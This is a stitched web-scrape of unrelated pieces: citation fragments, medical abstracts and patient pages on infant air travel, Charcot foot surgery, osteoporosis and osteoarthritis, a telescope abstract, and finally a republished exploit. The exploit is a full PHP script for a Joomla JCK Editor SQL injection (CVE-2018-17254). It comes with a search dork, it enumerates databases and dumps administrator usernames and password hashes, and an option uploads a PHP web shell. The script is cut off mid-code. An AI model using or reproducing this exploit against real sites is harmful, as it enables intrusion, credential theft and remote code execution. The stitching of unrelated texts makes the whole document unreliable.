ArticleGoogle Scholar 24. Anselme K, Bigerelle M: Topography effects of pure titanium substrates on human osteoblast long-term adhesion. Acta Biomater 2005, 1: 211–222.View ArticleGoogle Scholar 25. Bigerelle M, Anselme K, Dufresne E, Hardouin P, Iost A: An unscaled parameter to measure the order of surfaces: a new surface elaboration to increase cells adhesion. Biomol Eng 2002, 19: 79–83.View ArticleGoogle Scholar 26. Curtis A, Wilkinson C: Nantotechniques and approaches in biotechnology. Trends Biotechnol 2001, 19: 97–101.View ArticleGoogle Scholar 27. 
Scotchford CA, Ball M, Winkelmann M, Voros J, Csucs C, Brunette DM, Danuser G, Textor M: Chemically patterned, metal-oxide-based surfaces produced by photolithographic techniques for studying protein- and cell-interactions. II: protein adsorption and early cell interactions. Biomaterials 2003, 24: 1147–1158.View ArticleGoogle Scholar 28. Huang J, Best SM, Bonfield W, Brooks RA, Rushton N, Jayasinghe SN, Edirisinghe MJ: In vitro assessment of the biological response to nano-sized hydroxyapatite. J Mater Sci Mater Med 2004, 15: 441–445.View ArticleGoogle Scholar 29. Peters K, Unger RE, Kirkpatrick CJ, Gatti AM, Monari E: Effects of nano-scaled particles on endothelial cell function in vitro: studies on viability, proliferation and inflammation. J Mater Sci Mater Med 2004, 15: 321–325.View ArticleGoogle Scholar 30. Refai AK, Textor M, Brunette DM, Waterfield JD: Effect of titanium surface topography on macrophage activation and secretion of proinflammatory cytokines and chemokines. J Biomed Mater Res A 2004, 70: 194–205.View ArticleGoogle Scholar Copyright © Mohiuddin et al.; licensee Springer. 2012 This article is published under license to BioMed Central Ltd. This is an Open Access article distributed under the terms of the Creative Commons Attribution License (http://creativecommons.org/licenses/by/2.0), which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited.
__label__pos
0.609429
Fitness to fly testing in term and ex-preterm babies without bronchopulmonary dysplasia 1. C J Bossley1, 2. D Cramer1, 3. B Mason2, 4. A Hayward3, 5. J Smyth4, 6. A McKee1, 7. R Biddulph3, 8. E Ogundipe3, 9. A Jaffé2, 10. I M Balfour-Lynn1,4 1. 1Royal Brompton Hospital, London, UK 2. 2Department of Paediatric Respiratory Medicine, Sydney Children's Hospital, Sydney, New South Wales, Australia 3. 3Department of Neonatal Medicine, Royal Hospital for Women, Sydney, New South Wales, Australia 4. 4Department of Neonatal Medicine, Chelsea & Westminster Hospital, London, UK 1. Correspondence to Dr I M Balfour-Lynn, Department of Paediatric Respiratory Medicine, Royal Brompton & Harefield NHS Foundation Trust, Sydney Street, London SW3 6NP, UK; i.balfourlynn{at}ic.ac.uk Abstract Background During air flight, cabin pressurisation produces an effective fraction of inspired oxygen (FiO2) of 0.15. This can cause hypoxia in predisposed individuals, including infants with bronchopulmonary dysplasia (BPD), but the effect on ex-preterm babies without BPD was uncertain. The consequences of feeding a baby during the hypoxia challenge were also unknown. Methods Ex-preterm (without BPD) and term infants had fitness to fly tests (including a period of feeding) at 3 or 6 months corrected gestational age (CGA) in a body plethysmograph with an FiO2 of 0.15 for 20 min. A ‘failed’ test was defined as oxygen saturation (SpO2) <90% for at least 2 min. Results 41 term and 30 ex-preterm babies (mean gestational age 39.8 and 33.1 weeks, respectively) exhibited a significant median drop in SpO2 (median −6%, p<0.0001); there was no difference between term versus ex-preterm babies, or 3 versus 6 months. Two term (5%) and two ex-preterm (7%) babies failed the challenge. The SpO2 dropped further during feeding (median −4% in term and −2% in ex-preterm, p<0.0001), with transient desaturation (up to 30 s) <90% seen in 8/36 (22%) term and 9/28 (32%) ex-preterm infants; the ex-preterm babies desaturated more quickly (median 1 vs 3 min, p=0.002). Conclusions Ex-preterm babies without BPD and who are at least 3 months CGA do not appear to be a particularly at-risk group for air travel, and routine preflight testing is not indicated. Feeding babies in an FiO2 of 0.15 leads to a further fall in SpO2, which is significant but transient. Footnotes • Correction notice This article has been corrected since it was published Online First. The authors have requested that AH be added as the fourth author to this paper. • Competing interests None. • Patient consent Obtained. • Ethics approval This study was conducted with the approval of the Brompton, Harefield & National Heart Lung Institute Research Ethics Committee South Eastern Sydney and Illawarrah Human Research Ethics Committee – Northern Hospital Network Sector. • Provenance and peer review Not commissioned; externally peer reviewed.
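As a toy illustration of the stated pass/fail rule (SpO2 below 90% sustained for at least 2 min), a recorded saturation trace could be screened along the following lines. This sketch is not from the paper: the one-sample-per-second rate and the example trace are assumptions made purely for the demonstration.

def failed_challenge(spo2_trace, sample_interval_s=1, threshold=90, min_duration_s=120):
    """Return True if SpO2 stays below the threshold for at least min_duration_s."""
    needed = min_duration_s // sample_interval_s  # consecutive samples required
    run = 0
    for value in spo2_trace:
        run = run + 1 if value < threshold else 0
        if run >= needed:
            return True
    return False

# made-up trace: a brief 30 s dip under 90% should not count as a failed test
trace = [96] * 300 + [88] * 30 + [93] * 300
print(failed_challenge(trace))  # False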
Surgical Management of Diabetic Charcot Foot

The Charcot foot is a non-infective, destructive type of arthritis that affects between 1% and 2.5% of diabetics. The incidence of this arthritic process has increased recently because patients with diabetes mellitus are living longer. There is an equal distribution among males and females. The average age of patients developing a Charcot foot is 40 years. 30% of patients develop a Charcot foot in both feet and/or ankles.

This form of arthritis can develop suddenly and without pain. In a very short period of time the bones in the foot and/or ankle can spontaneously fracture and fragment. The final result in the development of a diabetic Charcot foot is severe foot deformity. These deformities may result in difficulty wearing standard footgear. As the deformity progresses the foot takes on the appearance of a "rocker bottom". As the arch of the foot collapses, areas of pressure develop on the bottom of the foot that are prone to developing open sores or ulcerations. Loss of ankle stability may occur to such an extent that the patient may not be able to walk without the use of a brace.

The vast majority of these deformities can be treated with non-operative care. New advances in technology and the development of new forms of lower extremity braces and splints have provided a wider range of treatment alternatives that are very effective in managing the Charcot foot. There are situations, however, where non-operative therapy is ineffective, and surgical management of the Charcot foot may be required to resolve some of the problems associated with the condition. Indications for surgery include: 1) chronic deformity with significant instability that is not amenable to brace treatment, 2) chronic deformity with increased plantar pressures and risk of ulceration, 3) a significant deformity with secondary ulceration that has failed to heal despite non-operative therapy, and 4) recurrent ulcers that have initially healed with non-operative care.

Surgical Intervention

Various types of surgery are available and may be required to manage a Charcot foot. The type of surgery that may be necessary depends on: 1) the anatomic location of the Charcot deformity (e.g. the midfoot, the ankle, etc.), 2) the stage of the Charcot process (there are three specific stages), 3) whether or not an ulcer is present, 4) whether or not the deformity is unstable, and 5) the overall health status of the patient. The types of surgical procedures include the following:

1. Ostectomy - Ostectomy is a surgical procedure where a portion of bone is removed from the bottom of the foot. This procedure is usually performed for a wound on the bottom of the foot that is secondary to pressure from a bony prominence. An ulcer may or may not be present. The goal of the surgery is to remove the bone causing increased pressure, thereby allowing the ulcer to resolve or preventing the area from ulcerating. This procedure is usually performed as an outpatient or may require a one-night stay in the hospital. The type of anesthesia selected depends upon the health status of the patient and the preference of the surgeon. Recovery time includes 3-4 weeks in a weight-bearing brace or cast. A patient can usually return to extra depth footgear with a diabetic insert following complete healing.

2. Midfoot Realignment Arthrodesis - This procedure is usually indicated when there is significant instability of the middle portion of the foot.
Usually the foot has collapsed and there is significant bony prominence along the bottom of the foot. Surgery is indicated when a simple ostectomy will not be sufficient. The goal of surgery is to provide stability and a relatively normal arch to the foot. This procedure usually requires a one or two night stay in the hospital. This is usually performed under general anesthesia and requires various types of internal fixation to be placed within the foot. This may include screws and plates. The convalescence associated with midfoot realignment arthrodesis is approximately three months in a non-weight-bearing cast. A patient may then progress to a weight-bearing brace for approximately 1-2 months. The patient will then return to an extra depth shoe with a diabetic insert at 5-6 months following surgery. 3. Hindfoot and Ankle Realignment Arthrodesis - Hindfoot and ankle realignment arthrodesis is usually indicated when there is significant instability resulting in a patient being unable to walk. These types of procedures are recommended when bracing has failed. Patients are basically non-ambulatory and many times amputation of the limb is the only other alternative. Realignment arthrodesis of the hindfoot and ankle is a limb salvage surgery. The ultimate goals of the procedure are to maintain a functional limb such that one can transfer within their home and possibly do some walking with the use of a brace or ambulatory assistive device. This procedure usually requires a 1-2 night stay in the hospital. The procedure is performed under general anesthesia and requires the use of various types of internal and external fixation devices. This may include the use of screws, plates, intramedullary nails and external fixators. The postoperative course includes approximately four months in a non-weight-bearing cast followed by a 2-3 month period of walking in a protective rocker bottom brace. A patient will then progress to a custom made brace that may be required throughout the course of their lifetime. Possible Complications Surgery in the diabetic patient always has significant risks. People with diabetes mellitus are more susceptible to infection due to their disease process. Therefore, these operations have a high complication rate. The arthrodesis procedures have a greater failure rate, increased risk of complications and longer convalescence relative to simple procedures such as ostectomy. It is recommended that a patient and their family have an extensive consultation with the surgeon to understand all potential risks including limb loss. A patient must be medically fit since this does require a general inhalation anesthesia and an extensive postoperative course. Preoperative work-up should include assessment of cardiac status and must be performed prior to surgical intervention. Summary Surgical management of the Charcot foot can be challenging and at times risky, but often the only alternative for limb-salvage. Many of the patients who undergo this type of surgery would otherwise go on to a below-the-knee amputation. Therefore, surgical management of the Charcot foot can be quite gratifying to the patient, the patient's family and the surgeon. The patient and the family should thoroughly understand the risks and benefits of the procedure and have an extensive preoperative consultation with the surgeon. It is recommended that surgery be performed by an experienced practitioner who has a thorough understanding of the disease process and experience with this type of surgery. 
It may be advantageous to have this type of surgery performed at a tertiary care facility to handle the potential complications that one might incur with these types of patients. Article provided by PodiatryNetwork.com.
Mono and stereo performance of the two SST-1M telescope prototypes

Jakub Jurysek (on behalf of SST-1M Group), ICRC 2023, Nagoya, Japan, 26. 7. – 3. 8. 2023

The Single-Mirror Small-Sized Telescope, or SST-1M, was originally developed as a prototype of a small-sized telescope for CTA, designed to form an array for observations of gamma-ray-induced atmospheric showers for energies above 3 TeV. A pair of SST-1M telescopes is currently being commissioned at the Ondrejov Observatory in the Czech Republic, and the telescope capabilities for mono and stereo observations are being tested in better astronomical conditions. The final location for the telescopes will be decided based on these tests. In this contribution, we present a data analysis pipeline called sst1mpipe, and the performance of the telescopes when working independently and in a stereo regime.
How Well Do You Know Osteoporosis?

Few people are aware of the true impact of osteoporosis, and yet many will suffer from it at some point in their lives. Related to a decline in bone mass density that can result in fractures, the condition currently affects about two million Canadians. It's chronic, it's hard to detect, and its effects can be catastrophic: 28 per cent of women and 37 per cent of men will die within a year of suffering an osteoporotic hip fracture. So how can you avoid this serious condition and continue to live happily and healthily? The first step is to talk to your doctor about taking a 10-year risk assessment. But before you do that, take this quiz. It'll help you learn a little more about osteoporosis and dispel some of the misconceptions about the disease.

True or False: Bone loss is a natural part of aging.
True. Women generally experience peak bone mass by the age of 20, while men attain it by 25. Both groups begin to lose their bone mass in their thirties. If left unchecked, their bones can wear away, leaving them vulnerable to osteoporotic fractures and breaks.

True or False: Men are vulnerable to osteoporosis.
True. While men are less likely to suffer from osteoporosis, at least one in five will suffer a bone break due to the condition.

True or False: There's no link between height loss and osteoporosis.
False. If a patient suffers a sudden height loss of more than two centimeters, it may indicate a spine fracture due to osteoporosis. People over 50 should be mindful of their height and speak to their healthcare professional if they notice any drastic changes.

True or False: Family history is irrelevant in an osteoporosis risk assessment.
False. Osteoporosis among first-degree relatives, particularly parental hip fractures, can be a key indicator in determining your risk.

True or False: Other medications can have a negative effect on your bone health.
True. The side effects of certain drugs may impact bone health. Be sure to mention your current medications when discussing osteoporosis with your doctor.

After reading this article, are you more likely to speak to your doctor about getting a 10-year fracture risk assessment?
OA Osteoarthritis search Osteoarthritis, Osteoarthrosis, Degenerative Joint Disease, DJD • Epidemiology 1. Most common form of Arthritis 2. Associated functional Impairment increases with age 3. Prevalence directly increases with age 1. Age over 40 years: 70% of U.S. population 2. Age over 65 years: 80% of U.S. population 3. See Rheumatologic Conditions in the Elderly • Pathophysiology 1. Primary lesion resides in the articular cartilage 1. Abnormal cartilage repair and remodeling 2. Chondrocytes produce proteolytic enzymes 3. Proteolytic enzymes destroy cartilage 2. End result 1. Asymmetric joint cartilage loss 2. Subchondral sclerosis (bone density increased) 3. Subchondral cysts 4. Marginal osteophytes • Risk Factors 1. Age over 50 years old 2. Female gender 3. Obesity 4. Prior joint injury 5. Job duties with frequent squatting or bending 6. Osteoarthritis Family History 7. Repetitive-impact sports (e.g. soccer, football) • Etiologies 1. Primary 1. Weight bearing joints 1. Hands 2. Hips, Knees, and feet 2. Stressors 1. Obesity (single most important factor) 2. Overuse injuries 2. Secondary 1. Acute or Chronic Trauma 2. History of knee meniscectomy 3. Congenital abnormalities 4. Rheumatic Conditions 1. Gouty Arthritis 2. Rheumatoid Arthritis 3. Calcium pyrophosphate deposition disease (CPPD) 5. Endocrine Conditions 1. Diabetes Mellitus 2. Acromegaly • Symptoms 1. Pain worse later in the day, and better with rest 1. Pain on motion that worsens with increasing joint usage (gelling) 2. If morning stiffness is present, is of short duration (<30 minutes) 1. Contrast with Rheumatoid Arthritis which has morning stiffness >30 minutes 2. Slowly progressive deformity and variably painful 1. Initial high-use Joint Pain relieved with rest 2. Next, pain is constant on affected joint usage 3. Eventually pain occurs at rest and at night 3. No systemic manifestations 1. No Fatigue 2. No generalized weakness 4. Associated muscle spasm, contractures and atrophy 5. Symptoms uncommon before age 40 years old 6. Asymmetric involvement • Signs 1. Joint Exam 1. Joint Effusion 2. Atrophy 3. Joint instability 4. Joint tenderness 5. Crepitation 6. Limited range of motion 2. Joints spared (Contrast with Rheumatoid Arthritis) 1. Wrist spared 2. Metacarpal-phalangeal joints spared (except thumb) 3. Elbow spared 4. Ankle spared (variable involvement) 3. Joints commonly involved 1. See Shoulder Osteoarthritis 2. See Acromioclavicular Osteoarthritis 3. See Knee Osteoarthritis 4. See Hip Osteoarthritis 5. See Foot Osteoarthritis 6. See Hand Osteoarthritis 1. Distal interphalangeal joints (Heberden's Nodes) 2. Proximal interphalangeal joints (Bouchard's Nodes) 3. First carpometacarpal joint (thumb) 7. Cervical and Lumbar Spine 1. Mechanisms 1. Apophyseal joint Arthritis and Osteophytes 2. Disc degeneration 2. Secondary affects 1. Local muscle spasm 2. Nerve root impingement with radiculopathy 3. Cervical stenosis 4. Lumbar Stenosis (Pseudoclaudication) • Labs • General (if indicated) 1. Routine labs are not indicated in typical Osteoarthritis 1. Obtain for unclear diagnosis 2. Abnormal results suggest alternative diagnosis 2. Erythrocyte Sedimentation Rate normal 3. C-Reactive Protein normal 4. Rheumatoid Factor negative 5. Uric Acid normal 1. Synovial Fluid appearance 1. Clear fluid 2. High viscosity and good mucin 2. Synovial Fluid Crystals 1. Basic Calcium Phosphate (BCP) Crystals 2. Apatite crystals 3. Synovial Fluid White Blood Cell Count 1. Non-Inflammatory fluid: 200 - 2000 WBC/mm3 2. 
WBC Count usually <500 cells (mostly mononuclear) • Imaging 1. Imaging is not required for Osteoarthritis diagnosis in patients with typical presentations 1. XRay, MRI Imaging often does not correlate with Osteoarthritis severity and patient function 1. Kim (2015) BMJ 351:h5983 +PMID:26631296 [PubMed] 2. Imaging indicated for pre-operative evaluation or if other diagnosis considered 1. Joint Trauma 2. Joint Pain at night 3. Progressive Joint Pain 4. Family History of other arthritic conditions 5. Age under 18 years 3. Findings 1. See Osteoarthritis XRay 2. See Foot XRay in Osteoarthritis 3. See Hand XRay in Osteoarthritis 4. See Hip XRay in Osteoarthritis 5. See Knee XRay in Osteoarthritis 6. See Spine XRay in Osteoarthritis • Management • Non-Pharmacologic Treatment 1. See Knee Osteoarthritis for Muscle Strengthening 2. Reduce Obesity 1. Weight loss of 5% from baseline or 6 kg (13 pounds) decreases pain and Disability 3. Physical Therapy 4. Physiotherapy (Heat, Cold, Contrast Baths or Ultrasound) 1. TENS not found to be effective 5. Consider comorbidity 1. See Depression in the Elderly 6. Exercise Program (do not exacerbate symptoms) 1. Stretching 2. Mild aerobic, active, Isometric Exercise (eliptical trainer, Bicycle) 3. Swimming 1. Highly effective Exercise for strength, flexibility and aerobic fitness 4. Tai chi 1. Song (2003) J Rheumatol 30:2039-44 [PubMed] 7. Joint protection 8. Work and home modified in severe disease 1. Limit weight bearing on affected joints 2. Walk Aids (Canes and Walkers) 9. Surgery 1. Hip replacement or knee replacement in refractory cases • Management • Pharmacologic Management 1. Acetaminophen (Tylenol) 1 gram orally twice daily (limit to 2-3 grams daily) 1. Less effective than NSAIDs, but safer 2. NSAIDs 1. Cautious use in age over 65 years, prior GI Bleed, Aspirin, Plavix, Warfarin or Corticosteroid 1. Consider with Proton Pump Inhibitor if 1-2 GI risks 2. Avoid NSAIDs completely if 3 or more GI risks 2. Avoid Feldene - higher risk of GI toxicity 3. Naproxen may have less cardiovascular risks 4. Observe for CNS effects (esp. Indomethacin) 5. Consider topical diclofenac (see below) 6. Switch classes when one NSAID is not effective 1. Diclofenac (Voltaren) 50 mg two to three times daily 2. NaproxenSodium (Naprosyn) 500 mg orally twice daily 3. Ibuprofen (Advil) 600 mg three times daily 4. Meloxicam (Mobic) 15 mg daily 5. Nabumetone (Relafen) 500 mg twice daily 6. Sulindac (Clinoril) 200 mg twice daily 3. COX2 Inhibitors 1. Celecoxib (Celebrex) 200 mg daily 2. No advantages to standard NSAIDs and still very expensive 4. Topical agents 1. Topical diclofenac 1. May be as effective as oral NSAIDs if only a few joints involved 2. Expensive and risk of skin reaction 2. Topical Capsaicin cream 1. Effective for refractory Joint Pain 2. Poorly tolerated 3. Avoid topical Salicylates such as Bengay (ineffective for Osteoarthritis) 5. Intraarticular agents 1. Intra-articular Corticosteroid injection 1. Avoid more than 3-4 times per year 2. Sodium hyaluronate (Synvisc) in Knee Osteoarthritis 6. Other systemic Analgesics 1. Tramadol (Ultram) 1. Effective, but with risks (NNT 6, NNH 8) 2. Cepeda (2007) J Rheumatol 34(3): 543-55 [PubMed] 2. Duloxetine (Cymbalta) 1. Effective, but with moderate Nausea risk (NNT 7, NNH 6) 2. Citrome (2012) Postgrad Med 124(1): 83-93 [PubMed] 3. Opioids 1. Generally not recommended due to significant risks • Management • Alternative Medications 1. Possibly effective agents (insufficient evidence to recommend) 1. 
Dimethyl Sulfoxide (DMSO) 25% applied topically 1. Small, 3 week studies showed reduced pain 2. Devil's Claw 2.4 grams daily 3. Ginger Extract 510 mg daily 4. Methlsulfonylmethane (MSM) 500 mg three times daily 5. S-Adenosylmethionine (SAMe) 200 mg three times daily 1. Methyl donor in proteoglycan synthesis 2. More effective than Placebo for pain, stiffness 3. Very expensive and unstable shelf life (Butanedisulfonate salt is most stable) 6. Glucosamine Sulfate 1. Dosing 1500 mg once daily or 500 mg orally three times daily 2. Effect may be delayed for 2 months 3. Initial studies demonstrated benefit 1. Towheed (2005) Cochrane Database Syst Rev (2):CD002946 [PubMed] 2. Richy (2003) Arch Intern Med 163(13):1514-22 [PubMed] 4. Later studies show no significant benefit 1. Roman-blas (2017) Arthritis Rheumatol 69(1): 77-85 [PubMed] 2. Wilkins (2010) JAMA 304(1):45-52 [PubMed] 2. Unknown benefit (anecdotal, inconclusive data or only small studies support) 1. Avocado-soybean unsaponifiables 300 mg daily 2. Boron supplementation 1. Effects Calcium Metabolism in bones, joints 2. Higher Arthritis rates with low boron intake 3. Cetyl Myristoleate (anti-inflammatory effects) 4. Acupuncture 5. FLUIDjoint 1. Concentrated milk proteins from New Zealand 2. Promoted as containing antibodies for Immunity 3. Not recommended due to $50/month and unproven 3. Agents to avoid 1. Agents that are ineffective for Osteoarthritis (but may have other indications) 1. Vitamin D Supplementation 2. Antioxidant supplements 2. Ineffective agents (avoid these based on high quality studies) 1. Chondroitin sulfate 400 mg PO tid 2. Tipi 3. Reumalex 4. Ionized wrist bracelets 5. Osteoarthritis Shoes 3. Preparations with serious adverse effects and either ineffective or unproven efficacy 1. Limbrel (Flavocoxid) 1. Risk of Acute Hepatitis and Hypersensitivity pneumonitis 4. References 1. Morelli (2003) Am Fam Physician 67(2):339-44 [PubMed] 2. Gregory (2008) Am Fam Physician 77(2): 177-84 [PubMed] • Prevention 1. Maintain appropriate body weight 2. Continued moderate joint activity is critical 1. Normal joint use directs cartilage remodeling 2. Decreased joint use risks abnormal cartilage repair 1. Information from your Family Doctor: Staying Active 1. http://www.familydoctor.org/healthfacts/115/
Joomla JCK Editor 6.4.4 SQL Injection ≈ Packet Storm – Digitalmunition Exploit/Advisories no-image-featured-image.png Published on March 9th, 2021 📆 | 4863 Views ⚑ 0 Joomla JCK Editor 6.4.4 SQL Injection ≈ Packet Storm # Exploit Title: Joomla JCK Editor 6.4.4 – ‘parent’ SQL Injection (2) # Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/ # Date: 05/03/2021 # Exploit Author: Nicholas Ferreira # Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor # Version: 6.4.4 # Tested on: Debian 10 # CVE : CVE-2018-17254 # PHP version (exploit): 7.3.27 # POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=”%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL–%20aa < ?php $vuln_file = ‘/editors/jckeditor/plugins/jtreelink/dialogs/links.php’; function payload($str1, $str2=””){ return ‘?extension=menu&view=menu&parent=”%20UNION%20SELECT%20NULL,NULL,’.$str1.’,NULL,NULL,NULL,NULL,NULL’.$str2.’–%20aa’; #” } function get_request($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); #curl_setopt($ch, CURLOPT_PROXY, “127.0.0.1:8080”); $output = curl_exec($ch); curl_close($ch); return $output; } function parse_columns($columns){ $parsed_columns = array(); foreach($columns as $col){ array_push($parsed_columns, $col); array_push($parsed_columns, “0x242324”); //delimiter = $#$ } return $parsed_columns; } function inject($url, $payload){ global $vuln_file; $request = get_request($url.$vuln_file.$payload); preg_match_all(‘/url =”(.*)”>/’, $request, $output); return $output; } ###### function is_vulnerable($url){ global $vuln_file; $output = inject($url, payload(“0x6861636b6564”)); if(isset($output[1][0])){ if(base64_encode($output[1][0]) == “aGFja2Vk”){ //checking if we can inject return 1; } } return 0; } function get_db_names($url){ global $vuln_file; $db_names = array(); $output = inject($url, payload(“schema_name”, “%20from%20information_schema.schemata”)); foreach($output[1] as $db){ array_push($db_names, $db); } return $db_names; } function get_table_names($url, $db){ global $vuln_file; $table_names = array(); $output = inject($url, payload(“table_name”, “%20from%20information_schema.tables%20WHERE%20table_schema=%27”.$db.”%27″)); foreach($output as $table){ array_push($table_names, $table); } return $table_names; } function get_column_names($url, $table){ global $vuln_file; $column_names = array(); $output = inject($url, payload(“column_name”, “%20from%20information_schema.columns%20WHERE%20table_name=%27”.$table.”%27″)); foreach($output as $column){ array_push($column_names, $column); } return $column_names; } function dump_columns($url, $columns, $dbname, $table){ global $vuln_file; $column_dump = array(); $related_arr = array(); $data = array(); $output = inject($url, payload(“concat(“.implode(‘,’, parse_columns($columns)).”)”, “%20from%20″.$dbname.”.”.$table)); foreach($output[1] as $column){ $exploded = explode(“$#$”, $column); array_push($data, $exploded); } foreach($data as $user_info){ array_pop($user_info); array_push($related_arr, array_combine($columns, $user_info)); } return $related_arr; } function rce($url){ //probably won’t work =( global $vuln_file; if(!is_vulnerable($url)){ die(red(“[-] Target isn’t vulnerable.”)); } $server_root = array(“/var/www/”, “/var/www/html/”, “/usr/local/apache2/htdocs/”, “/var/www/nginx-default/”, “/srv/www/”, “/usr/local/apache2/htdocs/”); $rand_content = 
“AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2”; $payl0ad = “‘< ?php system($_GET[0]); ?> “.$rand_content.”‘”; $filename = rand(1000, 7359).”.php”; echo cyan(“[i]”).” Trying to upload a RCE shell…n”; foreach($server_root as $path){ inject($url, payload($payl0ad, ” INTO OUTFILE ‘”.$path.$filename.”‘”)); } $get_shell = get_request($url.”/”.$filename); if(strpos($get_shell, $rand_content) !== false){ echo green(“[+] RCE shell successfully uploaded! =)n”); die(“Usage: “.$url.”/”.$filename.”?0=whoamin”); }else{ echo(red(“[-] “).”Could not upload RCE shell. Maybe stacked queries are not supported. =(n”); die(cyan(“[i] “).”But you can still inject SQL commands! What about dumping the users table? =)n”); } } function read_file($url, $file){ global $vuln_file; } ############ function green($str){ return “e[92m”.$str.”e[0m”; } function red($str){ return “e[91m”.$str.”e[0m”; } function yellow($str){ return “e[93m”.$str.”e[0m”; } function cyan($str){ return “e[96m”.$str.”e[0m”; } function banner(){ echo “ ___ _____ _ __ _____ |_ |/ __ | | / /| _ | || / /| |/ / | | | | _ _ _ __ ___ _ __ ___ _ _ | || | | | | | || | | || ‘_ ` _ | ‘_ / _ | ‘__| /__/ /| __/| | | |/ / | |_| || | | | | || |_) || __/| | ____/ ____/_| _/|___/ __,_||_| |_| |_|| .__/ ___||_| “.green(“Coder: “).yellow(“Nicholas Ferreira”).” | | |_| “; } $target = 0; $rce = 0; function check(){ global $argv; global $argc; global $target; global $rce; global $target_list; global $save_output; global $verbose; global $less; global $specified_db; $short_args = “u:t:v::h::l::r::d::”; $long_args = array(“url:”,”targets::”,”verbose::”,”help::”,”less::”,”rce::”, “db::”); $options = getopt($short_args, $long_args); if(isset($options[‘h’]) || $argc == 1 || isset($options[‘help’])){ echo “JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254) Usage: php “.$argv[0].” -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db] -u, –url: Path to Joomla! plugins (e.g. website.com/site/plugins/) -h, –help: Help -v, –verbose: Verbose mode (print tables) -l, –less: Less outputs (only Administrator usernames and passwords) -t, –targets: Load a list of targets -r, –rce: Try to upload a RCE shell -d, –db: Specifies the DB to dump “; } if(isset($options[‘u’])){ $target = $options[‘u’]; }elseif(isset($options[‘url’])){ $target = $options[‘url’]; }else{ $target = “”; } isset($options[‘v’]) || isset($options[‘verbose’]) ? $verbose = 1 : $verbose = 0; isset($options[‘l’]) || isset($options[‘less’]) ? $less = 1 : $less = 0; isset($options[‘r’]) || isset($options[‘rce’]) ? $rce = 1 : $rce = 0; isset($options[‘f’]) ? $target_list = $options[‘f’] : $target_list = 0; if(isset($options[‘t’])){ $target_list = $options[‘t’]; }elseif(isset($options[‘targets’])){ $target_list = $options[‘targets’]; }else{ $target_list = 0; } if(isset($options[‘d’])){ $specified_db = $options[‘d’]; }elseif(isset($options[‘db’])){ $specified_db = $options[‘db’]; }else{ $specified_db = 0; } if(strlen($target_list) < 2){ if($target !== “”){ // check if URL is ok if(!preg_match(‘/^((https?://)|(www.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(/.*)?$/’, $target)){ die(red(“[i] The target must be a URL.n”)); } if(strpos($target, “plugins”) == false){ die(red(“[-] You must provide the Joomla! plugins path! 
(standard: exemple.com/plugins/)n”)); } }else{ die(cyan(“[-] “).”You can get help with -h.n”); } } if($target_list !== 0){ //check if target list is readable if(!file_exists($target_list)){ die(red(“[-] “).”Could not read target list file.n”); } } } function exploit($url){ // returns users and passwords global $vuln_file; global $verbose; global $rce; global $specified_db; global $less; echo cyan(“n=========================| “.str_replace(“plugins”, “”, $url).” |=========================nnn”); echo cyan(“[+] “).”Checking if target is vulnerable…n”; if (is_vulnerable($url)){ $main_db = inject($url, payload(“database()”))[1]; $user_table = “”; $hostname = inject($url, payload(“@@hostname”))[1]; $mysql_user = inject($url, payload(“user()”))[1]; $mysql_version = inject($url, payload(“@@version”))[1]; $connection_id = inject($url, payload(“connection_id()”))[1]; echo green(“[+] Target is vulnerable! =)nn”); echo cyan(“[i] “).”Hostname: “.yellow($hostname[0]).”n”; echo cyan(“[i] “).”Current database: “.yellow($main_db[0]).”n”; echo cyan(“[i] “).”MySQL version: “.yellow($mysql_version[0]).”n”; echo cyan(“[i] “).”MySQL user: “.yellow($mysql_user[0]).”n”; echo cyan(“[i] “).”Connection ID: “.yellow($connection_id[0]).”nn”; if($rce){ rce($url); } echo cyan(“[+] “).”Getting DB names…n”; $dbs = get_db_names($url); if(count($dbs) == 0){ echo(“[-] There are no DBs available on this target. =(n”); } $db_list = array(); foreach($dbs as $db){ $num_table = count(get_table_names($url, $db)[1]); echo green(“[+] DB found: “).cyan($db.” [“.$num_table.” tables]”).”n”; array_push($db_list, $db); } if($main_db == “” && !$specified_db){ echo(red(“[-] Could not find Joomla! default DB. Try to dump another DB with -d. n”)); } if($specified_db !== 0){ // if user doesn’t specify a custom db echo cyan(“n[+] “).”Getting tables from “.yellow($specified_db).”…n”; $tables = get_table_names($url, $specified_db); }else{ foreach($db_list as $new_db){ if($new_db !== “test” && strlen(strpos($new_db, “information_schema”) !== false) == 0){ // neither test nor i_schema echo cyan(“n[+] “).”Getting tables from “.yellow($new_db).”…n”; $tables = get_table_names($url, $new_db); } } } echo cyan(“[+] “).yellow(count($tables[1])).” tables found! n”; if(count($tables[1]) == 0){ echo(red(“[-] “.”Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. n”)); } foreach($tables[1] as $table){ if($verbose) echo $table.”n”; if(strpos($table, “_users”) !== false){ $user_table = $table; } } if($user_table == “”){ echo(red(“[-] Could not find Joomla default users table. Try to find it manually!n”)); } echo cyan(“[+] “).”Getting columns from “.yellow($user_table).”…n”; $columns = get_column_names($url, $user_table); if(count($columns) == 0){ echo(red(“[-] There are no columns on this table… =(n”)); } if($verbose){ echo cyan(“[+] “).”Columns found:n”; foreach($columns[1] as $coll){ echo $coll.”n”; } } echo cyan(“[+] “).”Dumping usernames from “.yellow($user_table).”…n”; $dump = dump_columns($url, array(“id”,”usertype”, “name”,”username”,”password”,”email”,”lastvisitDate”), $db, $user_table); if(is_array($dump) && count($dump) == 0){ $new_dump = dump_columns($url, array(“id”,”name”,”username”,”password”,”email”,”lastvisitDate”), $db, $user_table); if(count($new_dump) == 0){ echo(red(“[-] This table is empty! 
